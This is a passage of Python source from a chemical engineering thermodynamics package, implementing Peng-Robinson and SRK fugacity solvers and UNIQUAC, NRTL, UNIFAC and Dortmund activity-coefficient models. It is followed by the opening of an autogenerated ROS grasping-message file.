if kij_input.get((i,j),None):
if abs(kij_input.get((i,j))) < 0.3:
kijs[(i,j)] = kij_input[(i,j)]
else:
kijs[(i,j)] = 0
else:
kijs[(i,j)] = kijs[(j,i)]
def calculate_amix(y):
"""a value for mixture"""
amix = 0 #Placeholder for a_mixture values
for i in range(0,len(cs)) :
for j in range(0,len(cs)):
kij = kijs[(i,j)]
ai = calculate_a(cs[i]) #ai value
aj = calculate_a(cs[j]) #aj value
amix += y[i]*y[j]*sqrt(ai * aj)*(1-kij) #Update a_mix
return amix
def calculate_bmix(y):
""" b value for the mixture"""
bmix = 0
for i in range(0, len(cs)):
bmix += y[i]*calculate_b(cs[i])
return bmix
#amix = calculate_amix(y) # amix calculated value
#bmix = calculate_bmix(y) #bmix calculated value
def calculate_A(a,T):
"""Calculates A value for component or mixture. a or amix"""
A = a * P/(R**2)/(T**2.5) # A factor
return A
def calculate_B(b,T):
"""Calculates B value for a component or mixture."""
B = b * P/(R*T) # B factor
return B
def calculate_Z(A,B,T):
coefficients = [1, -1, A-B-B**2, -A*B] # PR Z-equation
root = np_roots(coefficients)
return max(root)# Return largest root for vapor phase calculation
amix = calculate_amix(y)
bmix = calculate_bmix(y)
A = calculate_A(calculate_amix(y),T)
B = calculate_B(calculate_bmix(y),T)
Z = calculate_Z(A,B,T)
# CALCULATE FUGACITY COEFFICIENT
#Z = calculate_Z(A,B)
def calculate_phi(i,T):
"""Vapor phase fugacity coefficient phi for a component.
:param comp: Input the substance/chemical"""
comp = cs[i]
a = calculate_a(comp)
b = calculate_b(comp)
Ai = calculate_A(a,T)
Bi = calculate_B(b,T)
phi = Bi/B*(Z-1) - log(Z-B)+ A/B*(Bi/B - 2*(Ai/A)**0.5)*log(1+B/Z)
return exp(phi)
def h_deperture(cs):
"""Departure enthalpy with PR EOS"""
h_dep = 0
for i in range(0,len(cs)):
temp = T + 0.001
der1 = log(calculate_phi(cs[i], temp))
temp = T - 0.001
der2 = log(calculate_phi(cs[i], temp))
h_dep += (-R*T**2)*(der1-der2)/0.002*y[i]
return h_dep
def ig_enthalpy(cs):
enthalpy = 0
for i in range(0,len(cs)):
enthalpy += dbcall.ig_enthalpy(cs[i].IdealGasHeatCapacityCp, T)*y[i]
return enthalpy/1000 #kJ/kmol
def s_deperture(cs):
"""Departure entropy with PR EOS"""
s_dep = 0
for i in range(0,len(cs)):
temp = T + 0.001
der1 = log(calculate_phi(cs[i], temp))
temp = T - 0.001
der2 = log(calculate_phi(cs[i], temp))
dphi = (der1-der2)/0.002
s_dep += (-R*(T*dphi + log(calculate_phi(cs[i],T))))*y[i]
return s_dep # J/mol.K
def ig_entropy(cs):
entropy = 0
P0 = 101325 # Reference pressure in Pa
for i in range(0,len(cs)):
#abs_entropy = float(cs[i].AbsEntropy)
entropy += (dbcall.ig_entropy(cs[i].IdealGasHeatCapacityCp, T) -R*1000*log(P/P0) -R*1000*log(y[i]) )*y[i]
return entropy/1000
def gibbs_energy():
return (ig_enthalpy(cs)+h_deperture(cs)) - (ig_entropy(cs)+s_deperture(cs))*T
phi = []
for i in range(len(cs)):
phi.append(calculate_phi(i,T))
return phi, kijs
class SRK():
def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
"""Soave-Redlich-Kwong equation of state solver for vapor phase.
:param components: Array that contains chemicals.
:param kij_input: Dict object {(i,j):kij, (i,k):kik....}
:param kij_tune: Tuning parameter for kij equation. Leave as None if kij_input given.
"""
cs = components # Components array
T = temp # get system temperature Kelvin
P = pressure #get system pressure Pascal
R = 8.314462 #Universal gas constant J/mol.K
y = fractions #Molar fractions array
#Calculate a(T) and b for each pure substance
def calculate_a(component,T):
"""Input a substance i.e cs[i]
Returns a value a = Pa.m^6/mol^2 """
w = float(component.AcentricityFactor) #acentric factor
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
Tr = T/Tc #Reduced Temperature T is the global Temp value
kappa = 0.48 + 1.574*w - 0.176*w**2 #SRK kappa value
c = 0.42747*(R**2)*(Tc**2)/Pc #SRK multiply factor
alfaT = (1 + kappa*(1-Tr**0.5))**2 #SRK alfa(T) function
aT = c*alfaT # a(T) Equation
return aT
def calculate_b(component):
"""Input a substance cs[i]
Returns b value b = m^3/mol """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
b = (0.08664*R*Tc)/Pc
return b
kijs = {}
if kij_input == None:
def calculate_kij(c1, c2, tune):
"""Calculate binary interaction parameter.
c1, c2 is the stream components, tune: 1.2 default
"""
Vc1 = float(c1.CriticalVolume) #Critical volume for substance 1
Vc2 = float(c2.CriticalVolume) #Critical volume for substance 2
k_ij = 1 - ( 2*sqrt( (Vc1**0.333)*(Vc2**0.333) )/(Vc1**0.333 + Vc2**0.333))**tune
return k_ij
if kij_tune != None:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_tune.get((i,j),None)!=None:
kijs[(i,j)] = calculate_kij(cs[i],cs[j],kij_tune[(i,j)] )
else:
kijs[(i,j)] = kijs[(j,i)]
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
kijs[(i,j)] = calculate_kij(cs[i],cs[j], 1.2) #Default tune 1.2
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_input.get((i,j),None):
if abs(kij_input.get((i,j))) < 0.3:
kijs[(i,j)] = kij_input[(i,j)]
else:
kijs[(i,j)] = 0
else:
kijs[(i,j)] = kijs[(j,i)]
def calculate_amix(y,T):
"""a(T) value for mixture"""
amix = 0 #Placeholder for a_mixture values
for i in range(0,len(cs)) :
for j in range(0,len(cs)):
kij = kijs[(i,j)] #kij value calculation
ai = calculate_a(cs[i],T) #ai value
aj = calculate_a(cs[j],T) #aj value
amix += y[i]*y[j]*sqrt(ai * aj)*(1-kij) #Update a_mix
return amix
def calculate_bmix(y):
""" b value for the mixture"""
bmix = 0
for i in range(0, len(cs)):
bmix += y[i]*calculate_b(cs[i])
return bmix
#amix = calculate_amix(y) # amix calculated value
#bmix = calculate_bmix(y) #bmix calculated value
def calculate_A(a,T):
"""Calculates A value for component or mixture. a or amix"""
A = a * P/(R**2)/(T**2) # A factor
return A
def calculate_B(b,T):
"""Calculates B value for a component or mixture."""
B = b * P/(R*T) # B factor
return B
def calculate_Z(A,B,T):
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
coefficients = [1, -1, A-B-B**2, -A*B] # PR Z-equation
return max(np_roots(coefficients))# Return largest root for vapor phase calculation
amix = calculate_amix(y,T)
bmix = calculate_bmix(y)
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
Z = calculate_Z(A,B,T)
# CALCULATE FUGACITY COEFFICIENT
#Z = calculate_Z(A,B)
def calculate_phi(i,T):
"""Vapor phase fugacity coefficient phi for a component.
:param comp: Input the substance/chemical"""
comp = cs[i]
a = calculate_a(comp,T)
b = calculate_b(comp)
ak = 0 # ak sum value for inside function
for k in range(0,len(cs)):
ak += y[k]* (1-kijs[(k,i)])* sqrt(calculate_a(cs[k],T)*calculate_a(comp,T))
phi = b*(Z-1)/bmix - log(Z-B) - A/B*(2*ak/amix - b/bmix)*log((Z+B)/Z)
return exp(phi)
fug_phi = []
for i in range(0,len(cs)):
fug_phi.append( calculate_phi(i,T) )
return fug_phi, kijs
def phi_liquid(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
"""Soave-Redlich-Kwong equation of state solver for vapor phase.
:param components: Array that contains chemicals.
:param kij_input: Dict object {(i,j):kij, (i,k):kik....}
:param kij_tune: Tuning parameter for kij equation. Leave as None if kij_input given.
"""
cs = components # Components array
T = temp # get system temperature Kelvin
P = pressure #get system pressure Pascal
R = 8.314462 #Universal gas constant J/mol.K
y = fractions #Molar fractions array
#Calculate a(T) and b for each pure substance
def calculate_a(component,T):
"""Input a substance i.e cs[i]
Returns a value a = Pa.m^6/mol^2 """
w = float(component.AcentricityFactor) #acentric factor
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
Tr = T/Tc #Reduced Temperature T is the global Temp value
kappa = 0.48 + 1.574*w - 0.176*w**2 #SRK kappa value
c = 0.42747*(R**2)*(Tc**2)/Pc #SRK multiply factor
alfaT = (1 + kappa*(1-Tr**0.5))**2 #SRK alfa(T) function
aT = c*alfaT # a(T) Equation
return aT
def calculate_b(component):
"""Input a substance cs[i]
Returns b value b = m^3/mol """
Tc = float(component.CriticalTemperature)
Pc = float(component.CriticalPressure)
b = (0.08664*R*Tc)/Pc
return b
kijs = {}
if kij_input == None:
def calculate_kij(c1, c2, tune):
"""Calculate binary interaction parameter.
c1, c2 is the stream components, tune: 1.2 default
"""
Vc1 = float(c1.CriticalVolume) #Critical volume for substance 1
Vc2 = float(c2.CriticalVolume) #Critical volume for substance 2
k_ij = 1 - ( 2*sqrt( (Vc1**0.333)*(Vc2**0.333) )/(Vc1**0.333 + Vc2**0.333))**tune
return k_ij
if kij_tune != None:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_tune.get((i,j),None)!=None:
kijs[(i,j)] = calculate_kij(cs[i],cs[j],kij_tune[(i,j)] )
else:
kijs[(i,j)] = kijs[(j,i)]
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
kijs[(i,j)] = calculate_kij(cs[i],cs[j], 1.2) #Default tune 1.2
else:
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i==j:
kijs[(i,j)] = 0
else:
if kij_input.get((i,j),None):
if abs(kij_input.get((i,j))) < 0.3:
kijs[(i,j)] = kij_input[(i,j)]
else:
kijs[(i,j)] = 0
else:
kijs[(i,j)] = kijs[(j,i)]
def calculate_amix(y,T):
"""a(T) value for mixture"""
amix = 0 #Placeholder for a_mixture values
for i in range(0,len(cs)) :
for j in range(0,len(cs)):
kij = kijs[(i,j)] #kij value calculation
ai = calculate_a(cs[i],T) #ai value
aj = calculate_a(cs[j],T) #aj value
amix += y[i]*y[j]*sqrt(ai * aj)*(1-kij) #Update a_mix
return amix
def calculate_bmix(y):
""" b value for the mixture"""
bmix = 0
for i in range(0, len(cs)):
bmix += y[i]*calculate_b(cs[i])
return bmix
#amix = calculate_amix(y) # amix calculated value
#bmix = calculate_bmix(y) #bmix calculated value
def calculate_A(a,T):
"""Calculates A value for component or mixture. a or amix"""
A = a * P/(R**2)/(T**2) # A factor
return A
def calculate_B(b,T):
"""Calculates B value for a component or mixture."""
B = b * P/(R*T) # B factor
return B
def calculate_Z(A,B,T):
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
coefficients = [1, -1, A-B-B**2, -A*B] # PR Z-equation
roots = np_roots(coefficients)
for root in roots:
if root > 0 and root < max(roots):
min_root = root
return min_root # Return smallest root for vapor phase calculation
amix = calculate_amix(y,T)
bmix = calculate_bmix(y)
A = calculate_A(calculate_amix(y,T),T)
B = calculate_B(calculate_bmix(y),T)
Z = calculate_Z(A,B,T)
# CALCULATE FUGACITY COEFFICIENT
#Z = calculate_Z(A,B)
def calculate_phi(i,T):
"""Vapor phase fugacity coefficient phi for a component.
:param comp: Input the substance/chemical"""
comp = cs[i]
a = calculate_a(comp,T)
b = calculate_b(comp)
ak = 0 # ak sum value for inside function
for k in range(0,len(cs)):
ak += y[k]* (1-kijs[(k,i)])* sqrt(calculate_a(cs[k],T)*calculate_a(comp,T))
phi = b*(Z-1)/bmix - log(Z-B) - A/B*(2*ak/amix - b/bmix)*log((Z+B)/Z)
return exp(phi)
fug_phi = []
for i in range(0,len(cs)):
fug_phi.append( calculate_phi(i,T) )
return fug_phi, kijs
class Ideal():
"""Ideal property method"""
def phi_vapor(components, temp, pressure, fractions, kij_input = None, kij_tune=None):
phi = []; kijs = {"Parameters":"No interaction parameters for Ideal system."}
for i in range(0, len(components)):
phi.append(1)
return phi, kijs
def gamma(components, temp, fractions):
gammas = []; kijs = {"Parameters":"No interaction parameters for Ideal system."}
for i in range(0, len(components)):
gammas.append(1)
return gammas, kijs
class Uniquac():
"""UNIQUAC model based activity coefficient calculations."""
def gamma(components,temperature,fractions):
cs = components
T = temperature
x = fractions
for item in x:
if item == 0:
item = 1E-05
r = []; q = []; qp = []
for k in range(0,len(cs)):
r.append( float(cs[k].UniquacR) )
q.append( float(cs[k].UniquacQ) )
qp.append( float(cs[k].UniquacQP) )
#---Calculate teta and fi values for each substance
teta = []; fi = []; tetap = [] #tetap = teta' prime value for gR calc.
for i in range(0,len(cs)):
fi_nom = x[i]*r[i] #fi Nominator
fi_denom = 0 #fi Denominator
teta_nom = x[i]*q[i]
teta_denom = 0
tetap_nom = x[i]*qp[i]
tetap_denom = 0
for j in range(0,len(cs)):
fi_denom += x[j]*r[j]
teta_denom += x[j]*q[j]
tetap_denom += x[j]*qp[j]
fi.append(fi_nom/fi_denom) #Fi value of the i. component
teta.append(teta_nom/teta_denom) #teta value of the i. component
tetap.append(tetap_nom/tetap_denom) #teta' prime value of the i. component
def a_ij(id1, id2):
file_path = MODELS_URL+"uniquac.txt"
with open(file_path, 'r') as f:
isFound = False # Is parameters found?
for line in f.readlines():
aux = line.split(';')
if aux[0] == id1 and aux[1] == id2:
a12 = aux[2]
isFound = True
elif aux[0] == id2 and aux[1] == id1:
a12 = aux[3]
isFound = True
if isFound:
return float(a12) #units.mol_enthalpy(float(a12),"CGS","SI") #Convert to kJ/kmol
else:
print('No parameters were found!')
def tau(i,j):
"""Calculates tau_ij values"""
if i == j:
return 1
else:
id1 = cs[i].LibraryIndex
id2 = cs[j].LibraryIndex
return exp( -a_ij(id1,id2)/(1.9872*T)) #R = 1.9872 cal/mol.K
taus = {}
for i in range(0,len(cs)):
for j in range(0,len(cs)):
taus[(i,j)] = tau(i,j)
def unsymmetric():
l = [0,0]
l[0] = 5*(r[0]-q[0]) - (r[0]-1)
l[1] = 5*(r[1]-q[1]) - (r[1]-1)
C1 = log(fi[0]/x[0]) + 5*q[0]*log(teta[0]/fi[0]) + fi[1]*(l[0]-r[0]*l[1]/r[1])
R1 = qp[0]*log(tetap[0]+tetap[1]*taus[(1,0)]) + tetap[1]*qp[0]*(taus[(1,0)]/(tetap[0]+tetap[1]*taus[(1,0)]) - taus[(0,1)]/(tetap[1]+tetap[0]*taus[(0,1)]))
return exp(C1+R1)
def symmetric():
C = []; R = []
for i in range(0,len(cs)):
C.append( 1 + log(fi[i]/x[i]) - fi[i]/x[i] -5*q[i]*( 1+ log(fi[i]/teta[i])- fi[i]/teta[i] ))
for j in range(0,len(cs)):
if i != j :
R.append( qp[i]*( 1- log( tetap[j]*taus[(j,i)]+tetap[i] )- tetap[j]*taus[(i,j)]/(tetap[j]+tetap[i]*taus[(i,j)]) - tetap[i]/(tetap[j]*taus[(j,i)]+tetap[i]) ) )
return exp(C[0]+R[0]), exp(C[1]+R[1])
return symmetric(), taus
class NRTL():
"""NRTL Activity coefficient calculations"""
def gamma(components, temperature, fractions):
cs = components
T = temperature
x = fractions
def a_ij(id1, id2):
file_path = MODELS_URL+"nrtl.txt"
with open(file_path, 'r') as f:
isFound = False # Is parameters found?
for line in f.readlines():
aux = line.split(';')
if aux[0] == id1 and aux[1] == id2:
a12 = aux[2]
alfa = aux[4]
isFound = True
elif aux[0] == id2 and aux[1] == id1:
alfa = aux[4]
a12 = aux[3]
isFound = True
if isFound:
return float(a12), float(alfa) #units.mol_enthalpy(float(a12),"CGS","SI") #Convert to kJ/kmol
else:
print('WARNING!: No parameters were found for a_ij! Default parameters were used')
return 100, 0.5 #Default parameters
aij = {}
for i in range(0,len(cs)):
for j in range(0,len(cs)):
if i != j:
aij[(i,j)] = a_ij( cs[i].LibraryIndex, cs[j].LibraryIndex )
def tau(i,j):
"""Calculates tau_ij values"""
if i == j:
return 0, 1
else:
aux_tau = aij[(i,j)]
return aux_tau[0]/(1.9872*T), aux_tau[1] #R = 1.9872 cal/mol.K
def G(i,j):
"""Calculates Gij value"""
if i == j:
return 1
else:
aux_G = tau(i,j)
return exp(-aux_G[1] * aux_G[0] )
S = []; C = []
for i in range (0, len(cs)):
aux1 = 0; aux2 = 0
for j in range(0,len(cs)):
aux1 += x[j]*G(j,i)
aux2 += x[j]*G(j,i) * tau(j,i)[0]
S.append(aux1)
C.append(aux2)
gamma = []
for i in range(0,len(cs)):
aux_k = 0
for k in range(0,len(cs)):
aux_k += x[k]*G(i,k)*(tau(i,k)[0] - C[k]/S[k])/S[k]
gamma.append( exp( C[i]/S[i] + aux_k) )
return gamma, aij
class Dortmund():
"""Modified Unifac Dortmund model"""
def gamma(components,temperature,fractions):
cs = components
T = temperature
x = fractions
for item in x:
if item == 0:
item = 1E-05
# Get Q and R values for groups
groupi = []; groupk = {}; ip = {}
file_path = MODELS_URL+"modfac.txt"
with open(file_path, 'r') as f:
lines = f.readlines()
for i in range(0,len(cs)):
groups = cs[i].ModifiedUnifac
rk_data = []
for pair in groups:
for line in lines:
aux = line.split(';')
if aux[3] == str(pair[0]):
ip[pair[0]] = int(aux[0])
if pair[0] in groupk.keys():
groupk[pair[0]][0].append((i,pair[1]))
else:
groupk[pair[0]] = ([(i, pair[1])], float(aux[4]), float(aux[5]))
rk_data.append( (pair[0], pair[1], float(aux[4]), float(aux[5])) )
break
groupi.append(rk_data)
#groupk= {17: ([(0, 1)], 0.92, 1.4), 1: ([(1, 1)], 0.9011, 0.848), 2: ([(1, 1)], 0.6744, 0.54), 15: ([(1, 1)], 1.0, 1.2)}
#Calculate r and q values for components
r = []; q = []
for i in range(0,len(cs)):
ri = 0; qi = 0
for data in groupi[i]:
ri += data[1]*data[2]
qi += data[1]*data[3]
r.append(ri)
q.append(qi)
# Calculation of residual and combinatorial parts
# ln gamma_k = Qk*[ 1-log(sum(tetai*taui,k)) - sum [ (tetai*taui,m)/sum(tetaj*tauj,m)]
# Calculate activity coefficients for each group
group_names = [] # Get group numbers
for key in groupk.keys():
group_names.append(key)
def X(k):
"""Calculates group fraction for k"""
aux_group = groupk[k]
aux1 = 0; aux2 = 0
for item in aux_group[0]: #Item = (i, vi)
vk = item[1]; i = item[0]
aux1 += vk*x[i]
for index in group_names:
aux_grp = groupk[index][0]
for itm in aux_grp:
aux2 += x[itm[0]]*itm[1]
return aux1/aux2
def tau(m,n):
if m == n:
return 1
else:
file_name = MODELS_URL+"modfac_ip.txt"
found = False
m = ip[m]; n = ip[n]
with open(file_name, 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split()
if m == n:
aij = 0; bij = 0; cij = 0
found = True
break
elif int(line[0]) == m and int(line[1]) == n:
aij = float(line[2])
found = True
bij = float(line[3])
cij = float(line[4])
break
elif int(line[0]) == n and int(line[1]) == m:
aij = float(line[5])
found = True
bij = float(line[6])
cij = float(line[7])
break
if found:
return exp( -(aij + bij*T + cij*T**2)/T)
else:
print("WARNING! No MODFAC interaction parameters were found for groups",m,n)
return exp(-50/T) #default value
taus = {}
for m in group_names:
for n in group_names:
taus[(m,n)] = tau(m,n)
Xk = [] #Calculate and store Xk values
for k in group_names:
Xk.append(X(k))
Xi = [] #Calculate and store Xk values for pure components
def X2(k, xi):
"""Calculates group fraction for k"""
aux_group = groupk[k]
aux1 = 0; aux2 = 0
for item in aux_group[0]: #Item = (i, vi)
vk = item[1]; i = item[0]
aux1 += vk*xi[i]
for index in group_names:
aux_grp = groupk[index][0]
for itm in aux_grp:
aux2 += xi[itm[0]]*itm[1]
return aux1/aux2
def teta(k):
"""Teta value for group m"""
Qk = groupk[k][2]
kk = group_names.index(k)
aux = 0
for n in group_names:
nk = group_names.index(n)
Qn = groupk[n][2]
aux += Qn*Xk[nk]
tet = groupk[k][2]*Xk[kk]/aux
return tet
for i in range(0,len(cs)):
ki = []
for k in group_names:# TODO loop sırasını değiştir i dışa k içe
xi = x.copy()
for j in range(0,len(xi)):
if i==j:
xi[j] = 1
else:
xi[j] = 0
ki.append( X2(k,xi) )
Xi.append(ki)
def tetai(k, i):
"""Teta value for group m in pure component"""
Qk = groupk[k][2]
kk = group_names.index(k)
aux = 0
for n in group_names:
nk = group_names.index(n)
Qn = groupk[n][2]
aux += Qn*Xi[i][nk]
teti = groupk[k][2]*Xi[i][kk]/aux
return teti
teta_k = []; teta_ki = []
for i in range(0,len(cs)):
pure_k = []
for k in group_names:
pure_k.append(tetai(k,i))
teta_ki.append(pure_k)
for k in group_names:
teta_k.append(teta(k))
activity_R = [] #Residual part for activity coefficient ln gammaR
for i in range(0,len(cs)):
ln_gamma_R = 0
for k in group_names:
vk = 0
for t in groupk[k][0]:
if t[0] == i:
vk = t[1]
Qk = groupk[k][2]
kk = group_names.index(k)
nom = 0; aux = 0
nom_i = 0; aux_i = 0
for m in group_names:
denom_i = 0; denom = 0
mm = group_names.index(m)
for n in group_names:
nn = group_names.index(n)
denom += teta_k[nn]*taus[(n,m)]
denom_i += teta_ki[i][nn]*taus[(n,m)]
nom += teta_k[mm]*taus[(k,m)]/denom
aux += teta_k[mm]*taus[(m,k)]
nom_i += teta_ki[i][mm]*taus[(k,m)]/denom_i
aux_i += teta_ki[i][mm]*taus[(m,k)]
ln_gamma_k = Qk*(1- log(aux) - nom )
ln_gamma_ki = Qk*(1- log(aux_i) - nom_i )
ln_gamma_R += vk*(ln_gamma_k - ln_gamma_ki)
#print(k, ln_gamma_k)
activity_R.append(ln_gamma_R)
activity_C = []
#Gamma combinatorial for components
V = []; F = []; Vp = [] # V' modified dortmund
for i in range (0,len(cs)):
aux_r = 0; aux_q = 0; aux_rp = 0
for j in range(0,len(cs)):
aux_r += r[j]*x[j]
aux_rp += (r[j]**0.75)*x[j]
aux_q += q[j]*x[j]
V.append(r[i]/aux_r)
Vp.append((r[i]**0.75)/aux_rp)
F.append(q[i]/aux_q)
for i in range(0, len(cs)):
aux = 1 - Vp[i]+ log(Vp[i]) - 5*q[i]*( 1- V[i]/F[i]+ log(V[i]/F[i]) )
activity_C.append(aux)
activity_coefficients = []
for i in range(0,len(cs)):
activity_coefficients.append( exp(activity_C[i] + activity_R[i]) )
return activity_coefficients, taus
class Unifac():
"""Unifac model activity coefficient"""
def gamma(components,temperature,fractions):
cs = components
T = temperature
x = fractions
for item in x:
if item == 0:
item = 1E-05
# Get Q and R values for groups
groupi = []; groupk = {}; ip = {}
file_path = MODELS_URL+"unifac.txt"
with open(file_path, 'r') as f:
lines = f.readlines()
for i in range(0,len(cs)):
groups = cs[i].UnifacVLE
rk_data = []
for pair in groups:
for line in lines:
aux = line.split(',')
if aux[1] == str(pair[0]):
ip[pair[0]] = int(aux[0])
if pair[0] in groupk.keys():
groupk[pair[0]][0].append((i,pair[1]))
else:
groupk[pair[0]] = ([(i, pair[1])], float(aux[4]), float(aux[5]))
rk_data.append( (pair[0], pair[1], float(aux[4]), float(aux[5])) )
break
groupi.append(rk_data)
#groupk= {17: ([(0, 1)], 0.92, 1.4), 1: ([(1, 1)], 0.9011, 0.848), 2: ([(1, 1)], 0.6744, 0.54), 15: ([(1, 1)], 1.0, 1.2)}
#Calculate r and q values for components
r = []; q = []
for i in range(0,len(cs)):
ri = 0; qi = 0
for data in groupi[i]:
ri += data[1]*data[2]
qi += data[1]*data[3]
r.append(ri)
q.append(qi)
# Calculation of residual and combinatorial parts
# ln gamma_k = Qk*[ 1-log(sum(tetai*taui,k)) - sum [ (tetai*taui,m)/sum(tetaj*tauj,m)]
# Calculate activity coefficients for each group
group_names = [] # Get group numbers
for key in groupk.keys():
group_names.append(key)
def X(k):
"""Calculates group fraction for k"""
aux_group = groupk[k]
aux1 = 0; aux2 = 0
for item in aux_group[0]: #Item = (i, vi)
vk = item[1]; i = item[0]
aux1 += vk*x[i]
for index in group_names:
aux_grp = groupk[index][0]
for itm in aux_grp:
aux2 += x[itm[0]]*itm[1]
return aux1/aux2
def tau(m,n):
if m == n:
return 1
else:
file_name = MODELS_URL+"unifac_ip.txt"
found = False
m = ip[m]; n = ip[n]
with open(file_name, 'r') as f:
lines = f.readlines()
for line in lines:
line = line.split("\t")
if int(line[0]) == m and int(line[2]) == n:
aij = float(line[4]); found = True
elif int(line[0]) == m and int(line[2]) == n:
aij = float(line[5]); found = True
if found:
return exp(-aij/T)
else:
print("WARNING! No UNIFAC interaction parameters were found for groups",m,n)
return exp(-50/T) #default value
taus = {}
for m in group_names:
for n in group_names:
taus[(m,n)] = tau(m,n)
Xk = [] #Calculate and store Xk values
for k in group_names:
Xk.append(X(k))
Xi = [] #Calculate and store Xk values for pure components
def X2(k, xi):
"""Calculates group fraction for k"""
aux_group = groupk[k]
aux1 = 0; aux2 = 0
for item in aux_group[0]: #Item = (i, vi)
vk = item[1]; i = item[0]
aux1 += vk*xi[i]
for index in group_names:
aux_grp = groupk[index][0]
for itm in aux_grp:
aux2 += xi[itm[0]]*itm[1]
return aux1/aux2
def teta(k):
"""Teta value for group m"""
Qk = groupk[k][2]
kk = group_names.index(k)
aux = 0
for n in group_names:
nk = group_names.index(n)
Qn = groupk[n][2]
aux += Qn*Xk[nk]
tet = groupk[k][2]*Xk[kk]/aux
return tet
for i in range(0,len(cs)):
ki = []
for k in group_names:
xi = x.copy()
for j in range(0,len(xi)):
if i==j:
xi[j] = 1
else:
xi[j] = 0
ki.append( X2(k,xi) )
Xi.append(ki)
def tetai(k, i):
"""Teta value for group m in pure component"""
Qk = groupk[k][2]
kk = group_names.index(k)
aux = 0
for n in group_names:
nk = group_names.index(n)
Qn = groupk[n][2]
aux += Qn*Xi[i][nk]
teti = groupk[k][2]*Xi[i][kk]/aux
return teti
teta_k = []; teta_ki = []
for i in range(0,len(cs)):
pure_k = []
for k in group_names:
pure_k.append(tetai(k,i))
teta_ki.append(pure_k)
for k in group_names:
teta_k.append(teta(k))
activity_R = [] #Residual part for activity coefficient ln gammaR
for i in range(0,len(cs)):
ln_gamma_R = 0
for k in group_names:
vk = 0
for t in groupk[k][0]:
if t[0] == i:
vk = t[1]
Qk = groupk[k][2]
kk = group_names.index(k)
nom = 0; aux = 0
nom_i = 0; aux_i = 0
for m in group_names:
denom_i = 0; denom = 0
mm = group_names.index(m)
for n in group_names:
nn = group_names.index(n)
denom += teta_k[nn]*taus[(n,m)]
denom_i += teta_ki[i][nn]*taus[(n,m)]
nom += teta_k[mm]*taus[(k,m)]/denom
aux += teta_k[mm]*taus[(m,k)]
nom_i += teta_ki[i][mm]*taus[(k,m)]/denom_i
aux_i += teta_ki[i][mm]*taus[(m,k)]
ln_gamma_k = Qk*(1- log(aux) - nom )
ln_gamma_ki = Qk*(1- log(aux_i) - nom_i )
ln_gamma_R += vk*(ln_gamma_k - ln_gamma_ki)
activity_R.append(ln_gamma_R)
activity_C = []
#Gamma combinatorial for components
V = []; F = []
for i in range (0,len(cs)):
aux_r = 0; aux_q = 0
for j in range(0,len(cs)):
aux_r += r[j]*x[j]
aux_q += q[j]*x[j]
V.append(r[i]/aux_r)
F.append(q[i]/aux_q)
for i in range(0, len(cs)):
aux = 1 - V[i]+ log(V[i]) - 5*q[i]*( 1- V[i]/F[i]+ log(V[i]/F[i]) )
activity_C.append(aux)
activity_coefficients = []
for i in range(0,len(cs)):
activity_coefficients.append( exp(activity_C[i] + activity_R[i]) )
print(taus)
return activity_coefficients, taus | 40.123348 | 195 | 0.43685 | 6,910 | 54,648 | 3.379016 | 0.053546 | 0.008737 | 0.031522 | 0.043342 | 0.886034 | 0.873099 | 0.869245 | 0.859394 | 0.852199 | 0.849715 | 0 | 0.037396 | 0.441187 | 54,648 | 1,362 | 196 | 40.123348 | 0.727192 | 0.168826 | 0 | 0.836914 | 0 | 0 | 0.009899 | 0 | 0 | 0 | 0 | 0.000734 | 0 | 1 | 0.076172 | false | 0 | 0.003906 | 0.000977 | 0.172852 | 0.004883 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
7c6a9e2ec98b83d982e00ca6b1061813672774c1 | 181,207 | py | Python | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | catkin_ws/devel/lib/python2.7/dist-packages/grasping_msgs/msg/_FindGraspableObjectsAction.py | RHolmewood/FetchRobot_Project2 | c096dd4bf88691d893010e95074f5c53baac37bc | [
"MIT"
] | null | null | null | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from grasping_msgs/FindGraspableObjectsAction.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import actionlib_msgs.msg
import genpy
import geometry_msgs.msg
import grasping_msgs.msg
import moveit_msgs.msg
import sensor_msgs.msg
import shape_msgs.msg
import std_msgs.msg
import trajectory_msgs.msg
class FindGraspableObjectsAction(genpy.Message):
_md5sum = "ee328bdfce4619bf201b406a666b5877"
_type = "grasping_msgs/FindGraspableObjectsAction"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
FindGraspableObjectsActionGoal action_goal
FindGraspableObjectsActionResult action_result
FindGraspableObjectsActionFeedback action_feedback
================================================================================
MSG: grasping_msgs/FindGraspableObjectsActionGoal
